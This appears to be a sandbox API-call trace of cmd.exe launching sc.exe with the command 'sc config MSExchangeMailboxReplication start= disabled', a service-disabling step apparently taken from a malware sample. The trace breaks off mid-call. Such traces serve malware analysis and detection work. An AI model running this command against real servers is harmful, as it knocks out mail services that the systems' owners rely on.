RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efeb8 | out: phkResult=0x1efeb8*=0x0) returned 0x2 [0131.451] VirtualQuery (in: lpAddress=0x1efebf, lpBuffer=0x1efe70, dwLength=0x1c | out: lpBuffer=0x1efe70*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.451] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efe70, dwLength=0x1c | out: lpBuffer=0x1efe70*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0131.451] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efe70, dwLength=0x1c | out: lpBuffer=0x1efe70*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0131.451] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efe70, dwLength=0x1c | out: lpBuffer=0x1efe70*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.451] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efe70, dwLength=0x1c | out: lpBuffer=0x1efe70*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0131.451] GetConsoleOutputCP () returned 0x1b5 [0131.451] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0131.452] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0131.452] _get_osfhandle (_FileHandle=1) returned 0x3c [0131.452] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0131.452] _get_osfhandle (_FileHandle=1) returned 0x3c [0131.452] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0131.452] _get_osfhandle (_FileHandle=1) returned 0x3c [0131.452] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0131.452] _get_osfhandle (_FileHandle=0) returned 0x38 [0131.452] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0131.452] _get_osfhandle (_FileHandle=0) returned 0x38 [0131.452] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0131.453] GetEnvironmentStringsW () returned 0x44e7dc0* [0131.453] FreeEnvironmentStringsA (penv="A") returned 1 [0131.453] GetEnvironmentStringsW () returned 0x44e7dc0* [0131.453] FreeEnvironmentStringsA (penv="A") returned 1 [0131.453] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eee1c | out: phkResult=0x1eee1c*=0x94) returned 0x0 [0131.453] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eee20, lpData=0x1eee28, lpcbData=0x1eee24*=0x1000 | out: lpType=0x1eee20*=0x0, lpData=0x1eee28*=0xc8, lpcbData=0x1eee24*=0x1000) returned 0x2 [0131.453] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eee20, lpData=0x1eee28, lpcbData=0x1eee24*=0x1000 | out: lpType=0x1eee20*=0x4, lpData=0x1eee28*=0x1, lpcbData=0x1eee24*=0x4) returned 0x0 [0131.453] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eee20, lpData=0x1eee28, lpcbData=0x1eee24*=0x1000 | out: lpType=0x1eee20*=0x0, lpData=0x1eee28*=0x1, lpcbData=0x1eee24*=0x1000) returned 0x2 [0131.453] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eee20, lpData=0x1eee28, lpcbData=0x1eee24*=0x1000 | out: lpType=0x1eee20*=0x4, lpData=0x1eee28*=0x0, lpcbData=0x1eee24*=0x4) returned 0x0 [0131.453] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eee20, lpData=0x1eee28, lpcbData=0x1eee24*=0x1000 | out: lpType=0x1eee20*=0x4, lpData=0x1eee28*=0x40, lpcbData=0x1eee24*=0x4) returned 0x0 [0131.453] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eee20, lpData=0x1eee28, lpcbData=0x1eee24*=0x1000 | out: lpType=0x1eee20*=0x4, lpData=0x1eee28*=0x40, lpcbData=0x1eee24*=0x4) returned 0x0 [0131.453] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eee20, lpData=0x1eee28, lpcbData=0x1eee24*=0x1000 | out: lpType=0x1eee20*=0x0, lpData=0x1eee28*=0x40, lpcbData=0x1eee24*=0x1000) returned 0x2 [0131.453] RegCloseKey (hKey=0x94) returned 0x0 [0131.453] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eee1c | out: phkResult=0x1eee1c*=0x94) returned 0x0 [0131.453] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eee20, lpData=0x1eee28, lpcbData=0x1eee24*=0x1000 | out: lpType=0x1eee20*=0x0, lpData=0x1eee28*=0x40, lpcbData=0x1eee24*=0x1000) returned 0x2 [0131.453] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eee20, lpData=0x1eee28, lpcbData=0x1eee24*=0x1000 | out: lpType=0x1eee20*=0x4, lpData=0x1eee28*=0x1, lpcbData=0x1eee24*=0x4) returned 0x0 [0131.453] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eee20, lpData=0x1eee28, lpcbData=0x1eee24*=0x1000 | out: lpType=0x1eee20*=0x0, lpData=0x1eee28*=0x1, lpcbData=0x1eee24*=0x1000) returned 0x2 [0131.453] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eee20, lpData=0x1eee28, lpcbData=0x1eee24*=0x1000 | out: lpType=0x1eee20*=0x4, lpData=0x1eee28*=0x0, lpcbData=0x1eee24*=0x4) returned 0x0 [0131.453] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eee20, lpData=0x1eee28, lpcbData=0x1eee24*=0x1000 | out: lpType=0x1eee20*=0x4, lpData=0x1eee28*=0x9, lpcbData=0x1eee24*=0x4) returned 0x0 [0131.453] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eee20, lpData=0x1eee28, lpcbData=0x1eee24*=0x1000 | out: lpType=0x1eee20*=0x4, lpData=0x1eee28*=0x9, lpcbData=0x1eee24*=0x4) returned 0x0 [0131.453] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eee20, lpData=0x1eee28, lpcbData=0x1eee24*=0x1000 | out: lpType=0x1eee20*=0x0, lpData=0x1eee28*=0x9, lpcbData=0x1eee24*=0x1000) returned 0x2 [0131.453] RegCloseKey (hKey=0x94) returned 0x0 [0131.454] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29834 [0131.454] srand (_Seed=0x5ad29834) [0131.454] GetCommandLineW () returned="/c sc config MSExchangeMailboxReplication start= disabled" [0131.454] GetCommandLineW () returned="/c sc config MSExchangeMailboxReplication start= disabled" [0131.454] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0131.454] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x44e9d18, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0131.454] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0131.454] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0131.454] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0131.454] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0131.454] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0131.454] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0131.454] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0131.454] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0131.454] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0131.454] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0131.454] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0131.454] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0131.454] GetEnvironmentStringsW () returned 0x44e7dc0* [0131.454] FreeEnvironmentStringsA (penv="A") returned 1 [0131.454] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.454] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0131.454] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0131.454] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0131.454] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0131.454] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0131.454] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0131.454] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0131.454] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0131.454] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0131.455] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1efbf4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0131.455] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x1efbf4, lpFilePart=0x1efbec | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x1efbec*="Desktop") returned 0x1d [0131.455] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0131.455] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef970 | out: lpFindFileData=0x1ef970) returned 0x44e05c8 [0131.455] FindClose (in: hFindFile=0x44e05c8 | out: hFindFile=0x44e05c8) returned 1 [0131.455] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x1ef970 | out: lpFindFileData=0x1ef970) returned 0x44e05c8 [0131.455] FindClose (in: hFindFile=0x44e05c8 | out: hFindFile=0x44e05c8) returned 1 [0131.455] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0131.455] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x1ef970 | out: lpFindFileData=0x1ef970) returned 0x44e05c8 [0131.455] FindClose (in: hFindFile=0x44e05c8 | out: hFindFile=0x44e05c8) returned 1 [0131.455] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0131.455] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0131.455] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0131.456] GetEnvironmentStringsW () returned 0x44e7dc0* [0131.456] FreeEnvironmentStringsA (penv="=") returned 1 [0131.456] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0131.456] GetConsoleOutputCP () returned 0x1b5 [0131.456] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0131.456] GetUserDefaultLCID () returned 0x409 [0131.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0131.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1efd24, cchData=128 | out: lpLCData="0") returned 2 [0131.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efd24, cchData=128 | out: lpLCData="0") returned 2 [0131.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efd24, cchData=128 | out: lpLCData="1") returned 2 [0131.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0131.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0131.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0131.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0131.457] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0131.457] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0131.457] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0131.457] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0131.457] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0131.457] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0131.457] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0131.457] GetConsoleTitleW (in: lpConsoleTitle=0x44eaa80, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.458] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0131.458] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0131.458] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0131.458] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0131.458] _wcsicmp (_String1="sc", _String2=")") returned 74 [0131.458] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0131.458] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0131.458] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0131.458] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0131.458] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0131.458] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0131.459] GetConsoleTitleW (in: lpConsoleTitle=0x1efa10, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.459] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0131.459] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0131.459] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0131.459] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0131.459] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0131.460] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0131.460] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0131.460] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0131.460] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0131.460] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0131.460] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0131.460] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0131.460] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0131.460] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0131.460] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0131.460] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0131.460] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0131.460] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0131.460] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0131.460] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0131.460] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0131.460] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0131.460] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0131.460] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0131.460] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0131.460] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0131.460] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0131.460] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0131.460] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0131.460] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0131.460] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0131.460] _wcsicmp (_String1="sc", _String2="START") returned -17 [0131.460] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0131.460] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0131.460] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0131.460] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0131.460] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0131.460] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0131.460] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0131.460] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0131.460] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0131.460] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0131.460] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0131.460] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0131.460] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0131.460] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0131.460] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0131.460] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0131.460] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0131.460] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0131.460] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0131.460] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0131.460] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0131.460] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0131.460] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0131.460] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0131.460] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0131.460] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0131.460] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0131.460] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0131.461] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0131.461] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0131.461] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0131.461] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0131.461] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0131.461] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0131.461] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0131.461] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0131.461] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0131.461] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0131.461] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0131.461] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0131.461] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0131.461] _wcsicmp (_String1="sc", _String2="START") returned -17 [0131.461] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0131.461] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0131.461] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0131.461] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0131.461] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0131.461] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0131.461] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0131.461] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0131.461] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0131.461] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0131.461] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0131.461] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0131.461] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0131.461] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0131.461] SetErrorMode (uMode=0x0) returned 0x0 [0131.461] SetErrorMode (uMode=0x1) returned 0x0 [0131.461] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x44e8dd0, lpFilePart=0x1ef51c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x1ef51c*="Desktop") returned 0x1d [0131.461] SetErrorMode (uMode=0x0) returned 0x1 [0131.462] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0131.462] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0131.469] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0131.469] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0131.469] GetConsoleTitleW (in: lpConsoleTitle=0x1ef79c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.469] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ef6c8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1ef6ac | out: lpAttributeList=0x1ef6c8, lpSize=0x1ef6ac) returned 1 [0131.469] UpdateProcThreadAttribute (in: lpAttributeList=0x1ef6c8, dwFlags=0x0, Attribute=0x60001, lpValue=0x1ef6b4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1ef6c8, lpPreviousValue=0x0) returned 1 [0131.469] GetStartupInfoW (in: lpStartupInfo=0x1ef700 | out: lpStartupInfo=0x1ef700*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0131.469] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0131.469] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0131.469] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0131.469] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0131.469] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0131.469] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0131.469] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0131.469] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0131.469] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0131.469] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0131.469] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0131.469] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0131.469] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0131.470] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0131.470] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0131.470] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0131.470] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0131.470] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.470] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.470] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.470] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.470] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0131.470] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0131.470] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0131.470] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0131.470] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0131.470] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0131.470] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0131.470] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0131.470] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0131.470] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0131.470] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0131.470] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0131.470] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0131.470] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0131.470] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0131.470] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0131.470] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0131.470] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0131.471] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc config MSExchangeMailboxReplication start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x1ef650*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc config MSExchangeMailboxReplication start= disabled", dwX=0x0, 